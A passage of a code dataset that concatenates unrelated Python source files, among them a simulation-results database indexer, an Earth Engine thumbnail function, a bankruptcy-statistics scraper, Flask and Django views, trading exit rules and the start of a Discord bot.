name\n \n \n table = {\"name\":tablename, \"match\":match.replace(\"$NAME\",name)}\n tables.append(table)\n \n else:\n print(\"No data.ini file found\")\n \n \n if not databasename: databasename = simbaPath/\"results.db\"\n db = sqlite3.connect(str(databasename))\n db.text_factory = str\n cur= db.cursor()\n\n num_add = 0\n num_moved = 0\n num_bad = 0\n num_undead = 0 \n num_ghost = 0\n \n # \n # If the locations optional argument is specified, we will restrict our directory search to the\n # specified paths.\n # Here, identify all the possible parent directories or directories in which to search, then\n # store in 'abslocations'\n #\n if locations:\n abslocations = set()\n for l in locations:\n abslocations.add((workingDirectory/pathlib.Path(l)).resolve())\n \n for table in tables:\n if specifictable:\n if not table['name'] == specifictable:\n continue\n \n ret = dict()\n \n types = dict()\n directories = set([d.replace(str(simbaPath)+'/../','') for d in sorted(glob(str(str(simbaPath)+\"/../\"+table[\"match\"])))])\n \n #\n # If optional locations argument is provided, filter out those directories not\n # included. Otherwise, continue with all directories specified.\n #\n if locations:\n keep = set()\n for dir in directories:\n for abslocation in abslocations:\n if abslocation == pathlib.Path(dir).resolve():\n keep.add(dir)\n if abslocation in pathlib.Path(dir).resolve().parents:\n keep.add(dir)\n directories = keep\n \n #\n # Scan metadata files to determine columns\n #\n for directory in directories:\n try:\n data = scripts.parseOutputDir(str(simbaPath)+\"/../\"+directory)\n except Exception as e:\n data = None\n print(\"Error in \", directory)\n print(e)\n if data:\n types.update(database.getTypes(data))\n \n #\n # Update/create the chosen table so all the values are represented\n #\n entries = database.getTableEntries(cur,table['name'])\n if (len(entries) > 0 or len(directories) > 0) and mode=='add' :\n database.updateTable(cur,table['name'],types,\"results\",False)\n \n #\n # If there are tables to delete, delete them\n # TODO\n #if args.remove:\n # for tab in list(args.remove):\n # cur.execute('DROP TABLE ' + tab)\n \n \n entries = database.getTableEntries(cur,table['name'])\n \n #\n # Scan each metadata file and add an entry to the table, skipping any\n # records that already exist.\n #\n new = []\n moved = []\n bad = []\n undead = []\n for directory in directories:\n if not os.path.isdir(directory): continue\n dirname = directory\n try:\n dirhash = scripts.getHash(str(simbaPath)+\"/../\"+directory)\n data = scripts.parseOutputDir(str(simbaPath)+\"/../\"+directory)\n except Exception as e:\n data = None\n \n if not data or not dirhash:\n if dirname in [e[1] for e in entries]:\n undead.append(dirname)\n else:\n bad.append(dirname)\n continue\n \n status = \"new\"\n for e in entries:\n if dirhash == e[0] and dirname == e[1]:\n status = \"old\"\n break\n elif dirhash == e[0] and not dirname == e[1]:\n status = \"moved\"\n moved.append([e[1],dirname])\n break\n if status == \"new\":\n new.append(dirname)\n \n if not dirhash:\n raise Exception(\"parseOutputDir.parse MUST include a HASH in its output\")\n if mode == \"add\":\n if status == \"new\":\n if(verbose): print('\\033[32madded ',dirname,'\\033[1;0m')\n database.updateTable(cur,table['name'],types,\"results\",False) ## TODO remove this\n database.updateRecord(cur,table['name'],data,dirhash,dirname,False)\n elif status == \"moved\":\n if(verbose): print('\\033[33mmoved ',moved[-1][0],'\\033[1;0m')\n if(verbose):print('\\033[33m тоб',moved[-1][1],'\\033[1;0m')\n database.updateRecord(cur,table['name'],data,dirhash,dirname,False)\n elif updateall:\n if(verbose):print('\\033[32mupdated ',dirname,'\\033[1;0m')\n database.updateRecord(cur,table['name'],data,dirhash,dirname,False)\n if mode == \"status\":\n if len(new)>0 or len(moved)>0 or len(bad)>0:\n for n in new:\n if(verbose): print('\\033[32mnew ',n,'\\033[1;0m')\n for m in moved:\n if(verbose): print('\\033[33mmoved ',m[0],'\\033[1;0m')\n if(verbose): print('\\033[33m тоб',m[1],'\\033[1;0m')\n for b in bad:\n if(verbose): print('\\033[31mbad ',b,'\\033[1;0m')\n \n if (len(entries) > 0 or len(directories) > 0) and mode=='add':\n database.updateTable(cur,table['name'],types,\"results\",False)\n \n \n entries = database.getTableEntries(cur,table['name'])\n for e in entries:\n directory = e[1]\n \n if directory == 'null': continue\n \n tablehash = e[0]\n try:\n dirhash = scripts.getHash(directory)\n except Exception as e:\n dirhash = None\n \n ghost = False\n if not dirhash: ghost = True\n if tablehash != dirhash: ghost = True\n \n if ghost:\n if directory in undead:\n if(verbose): print('\\033[90mundead '+directory+' missing metadata file ('+tablehash+')')\n else:\n if(verbose): print('\\033[90mghost ('+tablehash+') \\033[9m'+directory+'\\033[0m')\n num_ghost += 1\n #if mode == 'add': ## Let's NOT do this. \n # database.updateRecord(cur,table['name'], None, tablehash, 'null')\n \n num_add += len(new)\n num_moved += len(moved)\n num_bad += len(bad) \n num_undead += len(undead) \n\n ret['new'] = new\n ret['moved'] = moved\n ret['bad'] = bad\n ret['undead'] = undead\n retlist.append(ret)\n\n if(verbose): print()\n if(verbose): print('\\033[32mnew: ',num_add,'\\033[1;0m')\n if(verbose): print('\\033[33mmove: ',num_moved,'\\033[1;0m')\n if(verbose): print('\\033[31mbad: ',num_bad,'\\033[1;0m')\n if(verbose): print('\\033[90mundead: ',num_undead,'\\033[1;0m')\n if(verbose): print('\\033[90mghost: ',num_ghost,'\\033[1;0m')\n \n db.commit()\n db.close()\n\n return retlist\n \n\n\n \n","repo_name":"solidsgroup/simba","sub_path":"simba/simba_add.py","file_name":"simba_add.py","file_ext":"py","file_size_in_byte":9161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35177760990","text":"import ee\nimport json\nimport numpy as np\nimport ee_collection_specifics\n\naccount = 'skydipper@skydipper-196010.iam.gserviceaccount.com'\ncredentials = ee.ServiceAccountCredentials(account, 'privatekey.json')\nee.Initialize(credentials)\n\ndef ThumbURL(image, viz_params=None):\n \"\"\"Create a target url for tumb for an image.\n \"\"\"\n if viz_params:\n url = image.getThumbURL(viz_params)\n else:\n url = image.getThumbURL()\n return url\n\ndef TileURL(image, viz_params=None):\n \"\"\"Create a target url for tiles for an image.\n \"\"\"\n if viz_params:\n d = image.getMapId(viz_params)\n else:\n d = image.getMapId()\n base_url = 'https://earthengine.googleapis.com'\n url = (base_url + '/map/' + d['mapid'] + \"/{z}/{x}/{y}?token=\"+ d['token'])\n return url\n \ndef composite(request):\n request = request.get_json()\n\n # Geometry\n lon = request.get('lon')\n lat = request.get('lat')\n # Instrument\n collection = request.get('instrument')\n # Start and stop of time series\n startDate = ee.Date(request.get('start'))\n stopDate = ee.Date(request.get('end'))\n \n ## Area of Interest\n point = ee.Geometry.Point([lon, lat]).buffer(1000)\n # bounding box\n coordinates = np.array(point.bounds().getInfo()['coordinates'][0])\n bbox = [min(coordinates[:,0]), min(coordinates[:,1]), max(coordinates[:,0]), max(coordinates[:,1])]\n # Rectangle\n geom = ee.Geometry.Rectangle(bbox)\n region = geom.bounds().getInfo()['coordinates']\n\n # Bands\n bands = ee_collection_specifics.ee_bands_rgb(collection)\n # Visualiztion parameters\n visParam = ee_collection_specifics.vizz_params_rgb(collection)\n\n # Image Collection\n image_collection = ee_collection_specifics.ee_collections(collection) \n ## Composite\n image = ee_collection_specifics.Composite(collection)(image_collection, startDate, stopDate, geom)\n \n ## Select bands\n image = image.select(bands)\n\n ## Get ThumbURL\n thumb_url = ThumbURL(image, {'min':visParam['min'],'max':visParam['max'], 'region': region, 'dimensions': [256,256]})\n\n ## Get TileURL\n tile_url = TileURL(image.clip(geom), {'min':visParam['min'],'max':visParam['max']})\n \n return json.dumps({'thumb_url': thumb_url, 'tile_url': tile_url, 'bbox': bbox})","repo_name":"Skydipper/CNN-tests","sub_path":"notebooks/Google_Cloud_Functions/composite/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2286173407","text":"import numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport calendar\n\n# List of conties\ncounties = [\"Troms og Finnmark\", \"Nordland\", \"Trøndelag\", \"Møre og Romsdal\", \"Vestland\", \"Rogaland\", \"Agder\", \"Vestfold og Telemark\", \"Viken\", \"Oslo\", \"Innlandet\",\"Svalbard\",\"Utenlands\"]\n\n# Months in a year in numeric\nmonths = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\n\ndef daysInEachMonth(year):\n ''' Method to find out number of days in each month in a specific year '''\n days = []\n for i in range(1,13):\n days.append(calendar.monthrange(year, i)[1])\n\n return days\n\ndef parse_rows(response, i, results):\n '''\n Method that parses the response text and evaluates each element\n '''\n # Parse the response text\n soup = BeautifulSoup(response.text, 'html.parser')\n\n county = None\n counter = 0\n\n # Find all tr elements in the response\n for tr in soup.findAll('tr'):\n\n # Check if row value is a county\n if tr.text.strip() in counties:\n month = None\n\n # Store result of the month to the county dictionary\n if county != None:\n month = i+1 \n results[county][month] = counter\n\n # Set counter zero for next county\n counter = 0\n county = tr.text.strip()\n\n # If the county is not in the result dictionary - add key to dictionary\n if county not in results:\n results[county] = {}\n\n else:\n # If the value is not a county\n text = tr.text.strip()\n\n # Check if the value is \"Konkuråpning\" if it is - add another to the result\n if \"Konkursåpning\" in text:\n counter += 1\n\ndef scrapeWeb(days, year, results):\n '''\n Method that scrapes all months in a year. \n A new url is generate for each months in the year. \n '''\n # Loop as many times as it is months\n for i in range(len(months)):\n\n # Format a new url based on which month, number of days in the month and year\n url = (\"https://w2.brreg.no/kunngjoring/kombisok.jsp?datoFra=01.{}.{}&datoTil={}.{}.{}&id_region=0&id_niva1=51&id_niva2=56&id_bransje1=0\").format(months[i], year,days[i], months[i], year) \n \n # Send get request to the formatted url\n response = requests.get(url)\n\n parse_rows(response, i, results)\n\ndef calculateCumulative(liste, year):\n ''' Calculate cumulative '''\n for index,i in enumerate(liste):\n\n # If first element in list - do nothing\n if(index == 0):\n continue\n else:\n # Add the sum of the previous element\n liste[index] = i + liste[index - 1]\n \n return liste\n\ndef makeDataFrameAndPlotFigure(resultat_2019, resultat_2020):\n ''' Method to make the two data frames and plot the results for all conties '''\n\n # All months in 2019\n monts = ['Jan', 'Feb', 'Mar', 'Apr', 'Mai', 'Jun','Jul','Aug', 'Sep', 'Oct','Nov', 'Dec']\n\n # Only the nine first months in 2020\n monts_2020 = ['Jan', 'Feb', 'Mar', 'Apr', 'Mai', 'Jun','Jul','Aug', 'Sep']\n\n # Dataframe for 2019 with result of 12 months\n df_2019 = pd.DataFrame(columns=['2019'])\n df_2019['Months'] = monts\n\n # Dataframe for 2020 - only nine first months\n df_2020 = pd.DataFrame(columns=['2020'])\n df_2020['Months'] = monts[:9] \n\n # Go through all names in the county list\n for i in counties:\n counter = 1\n liste = []\n liste_2020 = []\n\n # Append the result for all 12 monts for both years\n while counter < 13:\n\n try:\n # Check if the month has any bankruptcies\n liste.append(resultat_2019[i][counter])\n except:\n # If the month had no bankruptcies add a zero to the list\n liste.append(0)\n try:\n liste_2020.append(resultat_2020[i][counter])\n except:\n liste_2020.append(0)\n counter += 1\n\n # Calculate cumulative number for both years\n liste = calculateCumulative(liste, 2019)\n liste_2020 = calculateCumulative(liste_2020, 2020)\n \n # Append the cumulative result into the dataframes\n df_2019['2019'] = liste\n df_2020['2020'] = liste_2020[:9]\n\n # Plot the line of 2020\n ax = df_2020.plot(x = 'Months', y = '2020')\n\n # Plot the line for 2019 i same plot\n df_2019.plot(x = 'Months', y = '2019',ax=ax)\n\n # Set limit for x and y\n plt.xticks(list(range(0,12)), monts)\n plt.ylim([0,1100])\n\n # Set title of figure\n plt.title(i)\n\n # Save figure\n plt.savefig(i)\n\ndef run():\n # Dictionaries for storing the results of each year\n banckrupcies_2019 = {}\n banckrupcies_2020 = {} \n\n days = daysInEachMonth(2019)\n days_2020 = daysInEachMonth(2020)\n scrapeWeb(days, 2019, banckrupcies_2019)\n scrapeWeb(days_2020, 2020, banckrupcies_2020)\n makeDataFrameAndPlotFigure(banckrupcies_2019, banckrupcies_2020)\n\nif __name__ == \"__main__\":\n run()","repo_name":"hellesand/Assignment-3-5-Data-Science","sub_path":"Assignment-6/Assignment-6.py","file_name":"Assignment-6.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26888483075","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nfrom flask import (\n current_app as app,\n render_template,\n request\n)\nfrom flask.views import View\n\nfrom dashboard.utils.backend import get_search_parameters\n\n\nclass GeneralJobsView(View):\n\n PAGE_TITLE = app.config.get(\"DEFAULT_PAGE_TITLE\")\n JOB_PAGES_TITLE = \"%s — %s\" % (PAGE_TITLE, \"Job Reports\")\n\n\nclass JobsAllView(GeneralJobsView):\n def dispatch_request(self):\n body_title = \"Available Jobs\"\n search_filter, page_len = get_search_parameters(request)\n return render_template(\n \"jobs-all.html\",\n body_title=body_title,\n page_len=page_len,\n page_title=self.JOB_PAGES_TITLE,\n search_filter=search_filter\n )\n\n\nclass JobsJobView(GeneralJobsView):\n def dispatch_request(self, **kwargs):\n body_title = \"Details for «%s»\" % kwargs[\"job\"]\n search_filter, page_len = get_search_parameters(request)\n return render_template(\n \"jobs-job.html\",\n body_title=body_title,\n job=kwargs[\"job\"],\n page_len=page_len,\n page_title=self.PAGE_TITLE,\n search_filter=search_filter\n )\n","repo_name":"joyxu/kernelci-frontend","sub_path":"app/dashboard/views/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73261786753","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.5dev'\n\nsetup(name='dexterity.draftspreviewbehavior',\n version=version,\n description=\"Preview behavior to show modified content before saving in default view\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='plone draft dexterity content',\n author='Jason Mehring',\n author_email='jason@canadapop.com',\n url='http://plone.org',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['dexterity'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'rwproperty',\n 'ZODB3',\n 'zope.interface',\n 'zope.component',\n 'zope.schema',\n 'zope.annotation',\n 'plone.app.intid',\n 'Zope2',\n 'plone.dexterity',\n 'plone.app.drafts'\n ],\n #extras_require={\n # 'tests': ['collective.testcaselayer', 'Products.PloneTestCase'],\n #},\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","repo_name":"collective/dexterity.draftspreviewbehavior","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10033128620","text":"\nfrom django.template import Template, Context\nfrom django.http import HttpResponse\nfrom django.db import models\nfrom django.shortcuts import redirect\n\ndef regards(request): #first view\n return HttpResponse(\"Hello World Django\") \n\ndef web_page(request):\n doc_externo = open(\"C:/Users/Alexander/Documents/BYU/BYU-Alex/CSE310/djangoPython/WebApp/WebApp/templates/plantilla.html\")\n plt = Template(doc_externo.read())\n doc_externo.close()\n ctx = Context()\n document = plt.render(ctx)\n return HttpResponse(document)\n\ndef register_client(request):\n name = request.GET['name']\n email = request.GET['email']\n subject = request.GET['subject']\n message = request.GET['message']\n\n clients = models.Client.objects.create(\n name = name,\n email = email,\n subject = subject,\n message = message\n )\n return redirect('/')","repo_name":"alexandercalva/djangoPython","sub_path":"WebApp/WebApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25052528356","text":"\"\"\"Need 1 instance of each exit rule for every ticker.\"\"\"\n\nclass ExitRule:\n def __init__(self):\n self.exit = False\n self.exitRuleName=None\n\n def __call__(self, *args, **kwargs):\n \"\"\"This has to return bool\"\"\"\n raise NotImplementedError(\"You need to implement this, buddy.\")\n\nclass EndOfDay(ExitRule):\n def __init__(self):\n \"\"\"time is a tuple with (hour, minute)\"\"\"\n super().__init__()\n self.trig_hour = 15\n self.trig_minute = 45\n self.exitRuleName=\"End of Day\"\n\n def __call__(self, *args, **kwargs):\n hr = kwargs[\"hour\"]\n minute = kwargs[\"minute\"]\n return (hr == self.trig_hour and minute >= self.trig_minute) or (hr > self.trig_hour)\n\nclass HitProfitTarget(ExitRule):\n def __init__(self, entry_price, isBull):\n \"\"\"isBull = True for long position, false for short position\"\"\"\n super().__init__()\n self.exitRuleName=\"Hit Profit Target\"\n self.percent_profit_target = 1\n self.entry_price = entry_price\n self.isBull = isBull\n\n def __call__(self, *args, **kwargs):\n if self.isBull:\n return (kwargs[\"price\"] >= self.entry_price * (1 + self.percent_profit_target / 100))\n else:\n return (kwargs[\"price\"] <= self.entry_price * (1 - self.percent_profit_target / 100))\n\n\nclass HitLossLimit(ExitRule):\n def __init__(self, entry_price, isBull):\n \"\"\"isBull = True for long position, false for short position\"\"\"\n super().__init__()\n self.exitRuleName=\"Hit Loss Limit\"\n self.loss_limit = 0.8\n self.entry_price = entry_price\n self.isBull = isBull\n\n def __call__(self, *args, **kwargs):\n if self.isBull:\n return (kwargs[\"price\"] <= self.entry_price * (1 - self.loss_limit/100))\n else:\n return (kwargs[\"price\"] >= self.entry_price * (1 + self.loss_limit / 100))\n\nclass Loose2Tight(ExitRule):\n def __init__(self, entryPrice, isBull, threshPercent=0.3, trailPercent=1, fastRatio=2):\n \"\"\"Exit threshold starts out like a trail stop, but trail % tightens up as price moves\n in the right direction.\"\"\"\n super().__init__()\n assert(isinstance(isBull, bool))\n assert (threshPercent >= 0)\n assert(fastRatio >= 1)\n self.entryPrice = entryPrice\n self.isBull = isBull\n self.prevPrice = entryPrice\n self.fastRatio = fastRatio\n if isBull:\n self.exitThresh = entryPrice * (1 - trailPercent / 100)\n self.threshPrice = entryPrice * (1 + threshPercent / 100)\n else:\n self.exitThresh = entryPrice * (1 + trailPercent / 100)\n self.threshPrice = entryPrice * (1 - threshPercent / 100)\n\n def __call__(self, *args, **kwargs):\n if \"price\" in kwargs.keys():\n price = kwargs[\"price\"]\n else:\n price = args[0]\n if self.isBull:\n if price > self.threshPrice and price > self.prevPrice:\n # increase exitThresh by fastratio\n delta = price - self.prevPrice\n self.exitThresh += delta * self.fastRatio\n self.prevPrice = price\n elif price > self.prevPrice and price > self.prevPrice:\n # increase exitThresh 1:1\n delta = price - self.prevPrice\n self.exitThresh += delta\n self.prevPrice = price\n else:\n # If price went down, do nothing.\n pass\n\n # Return position close decision:\n return price < self.exitThresh\n\n else:\n if price < self.threshPrice and price < self.prevPrice:\n # decrease exitThresh by fastRatio\n delta = self.prevPrice - price\n self.exitThresh -= delta * self.fastRatio\n self.prevPrice = price\n elif price < self.prevPrice and price < self.prevPrice:\n # decrease exitThresh 1:1\n delta = self.prevPrice - price\n self.exitThresh -= delta\n self.prevPrice = price\n else:\n # If price went up, do nothing.\n pass\n\n return price > self.exitThresh\n\ndef testLoose2Tight():\n # First test long:\n print(\"Testing Long\")\n price = 100\n uut = Loose2Tight(entryPrice=price, isBull=True, threshPercent=0.5, trailPercent=1, fastRatio=2)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(120):\n price += 0.05 if m % 2 == 0 else -0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(40):\n price -= 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\n # Now Test Short\n print(\"\\n\\n\\n\\nNow Testing Short\")\n price = 100\n uut = Loose2Tight(entryPrice=price, isBull=False, threshPercent=0.5, trailPercent=1, fastRatio=2)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(120):\n price += -0.05 if m % 2 == 0 else 0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(40):\n price += 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\nclass DontCatchUp(Loose2Tight):\n \"\"\"Like Loose2Tight except this one does not catch up with the stock. This one will not return True\n until price has changed direction.\"\"\"\n def __init__(self, entryPrice, isBull, threshPercent1=0.3, threshPercent2=0.7, trailPercent=1, fastRatio=2):\n super().__init__(entryPrice=entryPrice, isBull=isBull, threshPercent=threshPercent1, \\\n trailPercent=trailPercent, fastRatio=fastRatio)\n if isBull:\n self.secondThreshPrice = entryPrice * (1 + threshPercent2 / 100)\n else:\n self.secondThreshPrice = entryPrice * (1 - threshPercent2 / 100)\n\n def __call__(self, *args, **kwargs):\n if \"price\" in kwargs.keys():\n price = kwargs[\"price\"]\n else:\n price = args[0]\n if self.isBull:\n if price > self.secondThreshPrice and price > self.prevPrice:\n # increase exitThresh 1:1\n delta = price - self.prevPrice\n self.exitThresh += delta\n self.prevPrice = price\n elif price > self.threshPrice and price > self.prevPrice:\n # increase exitThresh by fastratio\n delta = price - self.prevPrice\n self.exitThresh += delta * self.fastRatio\n self.prevPrice = price\n elif price > self.prevPrice and price > self.prevPrice:\n # increase exitThresh 1:1\n delta = price - self.prevPrice\n self.exitThresh += delta\n self.prevPrice = price\n else:\n # If price went down, do nothing.\n pass\n # Return position close decision:\n return price < self.exitThresh\n\n else:\n if price < self.secondThreshPrice and price < self.prevPrice:\n # decrease exitThresh 1:1\n delta = self.prevPrice - price\n self.exitThresh -= delta\n self.prevPrice = price\n elif price < self.threshPrice and price < self.prevPrice:\n # decrease exitThresh by fastRatio\n delta = self.prevPrice - price\n self.exitThresh -= delta * self.fastRatio\n self.prevPrice = price\n elif price < self.prevPrice and price < self.prevPrice:\n # decrease exitThresh 1:1\n delta = self.prevPrice - price\n self.exitThresh -= delta\n self.prevPrice = price\n else:\n # If price went up, do nothing.\n pass\n return price > self.exitThresh\n\ndef testDontCatchUp():\n # First test long:\n print(\"Testing Long\")\n price = 100\n uut = DontCatchUp(entryPrice=price, isBull=True, threshPercent1=0.3, threshPercent2=0.7, trailPercent=1, fastRatio=3)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(100):\n price += 0.10 if m % 2 == 0 else -0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(50):\n price -= 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\n # Now Test Short\n print(\"\\n\\n\\n\\nNow Testing Short\")\n price = 100\n uut = DontCatchUp(entryPrice=price, isBull=False, threshPercent1=0.25, threshPercent2=0.7, trailPercent=1, fastRatio=2.8)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(100):\n price += -0.10 if m % 2 == 0 else 0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(50):\n price += 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\nclass SoftTrailStop(ExitRule):\n \"\"\"Put the 2:1 wrong way stuff here\"\"\"\n pass\n\nclass LowestPerformer(ExitRule):\n \"\"\"Unlike others, do not necessarily call this every sample.\n Call this when you get a trigger on something else, and you want\n to ditch the lowest performer.\n\n Also, unlike others, you want 1 instance for all tickers.\"\"\"\n def __init__(self):\n super().__init__()\n self.exitRuleName = \"Lowest Performer\"\n self.entryPrices = {} # % profit on competing positions\n self.nowPrices = {}\n self.isBull = {}\n\n def addTicker(self, ticker, entryPrice, isBull):\n self.entryPrices[ticker] = entryPrice\n self.nowPrices[ticker] = entryPrice\n self.isBull[ticker] = isBull\n\n def updateTicker(self, ticker, nowPrice):\n self.nowPrices[ticker] = nowPrice\n\n def __call__(self, *args, **kwargs):\n worstTicker = \"\"\n worstPayoff = 1E20\n for ticker in self.entryPrices.keys():\n if self.isBull[ticker]:\n onePayoff = self.nowPrices[ticker] - self.entryPrices[ticker]\n else:\n onePayoff = self.entryPrices[ticker] - self.nowPrices[ticker]\n onePercentage = 100 * onePayoff / self.entryPrices[ticker]\n if onePercentage < worstPayoff:\n worstPayoff = onePercentage\n worstTicker = ticker\n return (worstTicker, worstPayoff)\n\nclass PoopinAround(ExitRule):\n \"\"\"If it hasn't moved 1/2 a % in the last 2 hours, ditch it.\"\"\"\n def __init__(self, entryPrice, entranceTime, isBull):\n super().__init__()\n self.thresh1 = 0.1 # After 1 hr, it should move this much\n self.thresh2 = 0.33 # After 2 hr, it should move this much\n self.thresh3 = 0.67 # After 3 hr, it should move this much\n self.isBull = isBull\n self.entranceTime = entranceTime\n self.entryPrice = entryPrice\n\n def __call__(self, *args, **kwargs):\n now = kwargs[\"epoch\"]\n price = kwargs[\"price\"]\n if now >= self.entranceTime + 3*3600:\n if self.isBull:\n return price <= self.entryPrice * (1 + self.thresh3 / 100)\n else:\n return price >= self.entryPrice * (1 - self.thresh3 / 100)\n elif now >= self.entranceTime + 2*3600:\n if self.isBull:\n return price <= self.entryPrice * (1 + self.thresh2 / 100)\n else:\n return price >= self.entryPrice * (1 - self.thresh2 / 100)\n elif now >= self.entranceTime + 1*3600:\n if self.isBull:\n return price <= self.entryPrice * (1 + self.thresh1 / 100)\n else:\n return price >= self.entryPrice * (1 - self.thresh1 / 100)\n else:\n return False\n\nclass TimeLimit(ExitRule):\n \"\"\"Returns True if a position has been in the market for longer than timeLimit.\"\"\"\n def __init__(self, entranceTime, timeLimit):\n super().__init__()\n self.entranceTime = entranceTime\n self.timeLimit = timeLimit\n\n def __call__(self, *args, **kwargs):\n return kwargs[\"now\"] > self.entranceTime + self.timeLimit\n\nclass MinimumTime(ExitRule):\n \"\"\"Returns True if a position has been in the market for at least minTime.\n Algorithmically this is no difference from TimeLimit, but has names better suited\n for enabling other exit rules. For example, you might want some exit rules to only\n be enabled after a minimum amount of time.\n\n Note: You can also use this to ensure that a position stays CLOSED for a minimum\n length of time before opening a new position on the same ticker.\"\"\"\n def __init__(self, entranceTime, minTime):\n super().__init__()\n self.entranceTime = entranceTime\n self.minTime = minTime\n\n def __call__(self, *args, **kwargs):\n return kwargs[\"now\"] > self.entranceTime + self.minTime\n\nif __name__==\"__main__\":\n testDontCatchUp()\n\n\n\n\n\n\n\n","repo_name":"jstr045329/public_IB_data_ac","sub_path":"ExitRules.py","file_name":"ExitRules.py","file_ext":"py","file_size_in_byte":13999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15848596576","text":"n = int(input())\narr = list(map(int,input().split()))\nadd, mi, mu, did = map(int,input().split())\nmaxnum = -1e9\nminimum= 1e9\ndef dfs(depth, total, plus, minus, multiply,divide):\n global maxnum,minimum\n if depth==n:\n maxnum=max(total,maxnum)\n minimum=min(total,minimum)\n return\n\n if plus:\n dfs(depth+1,total+arr[depth],plus-1,minus,multiply,divide)\n if minus:\n dfs(depth+1,total-arr[depth],plus,minus-1,multiply,divide)\n if multiply:\n dfs(depth+1,total*arr[depth],plus,minus,multiply-1,divide)\n if divide:\n dfs(depth+1,int(total/arr[depth]),plus,minus,multiply,divide-1)\n\ndfs(1,arr[0],add,mi,mu,did)\nprint(maxnum)\nprint(minimum) ","repo_name":"gwonjihun/Algorithm","sub_path":"mid_exam/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32105619654","text":"#!/usr/bin/python\n\"\"\"\n discord_bot.py was created by Naum Raskind on February 25, 2023\n\"\"\"\nimport os\nimport discord\nfrom dotenv import load_dotenv\n\n\nclass FamJamClient(discord.Client):\n \"\"\"Represents Fam Jammer bot\n\n 1. The permissions for fam jammer are configured in the developer portal: https://discord.com/developers/applications/1079108221018574958/bot\n 2. To expand the class and listen to more events:\n - add event listeners in FAM_JAM_INTENTS: https://discordpy.readthedocs.io/en/stable/api.html#intents\n - override existing event handlers in discord.Client: https://discordpy.readthedocs.io/en/stable/api.html#discord.Client\n 3. To add emojis, find them here and copy paste: https://emojipedia.org/\n \"\"\"\n #: These are the events that discord will send the bot. At the moment this only includes messages sent within the server\n FAM_JAM_INTENTS = discord.Intents(guild_messages=True)\n #: Discord uses \"guild\" and \"server\" interchangeably. Guild name is the name of the server\n FAM_JAM_GUILD_NAME = \"Fam Jam\"\n\n def __init__(self) -> None:\n \"\"\"Construct a Fam Jam bot and set its token\"\"\"\n super().__init__(intents=self.FAM_JAM_INTENTS)\n self.token = self.get_token()\n\n async def on_ready(self) -> None:\n \"\"\"Log that the bot has connected to the fam jam 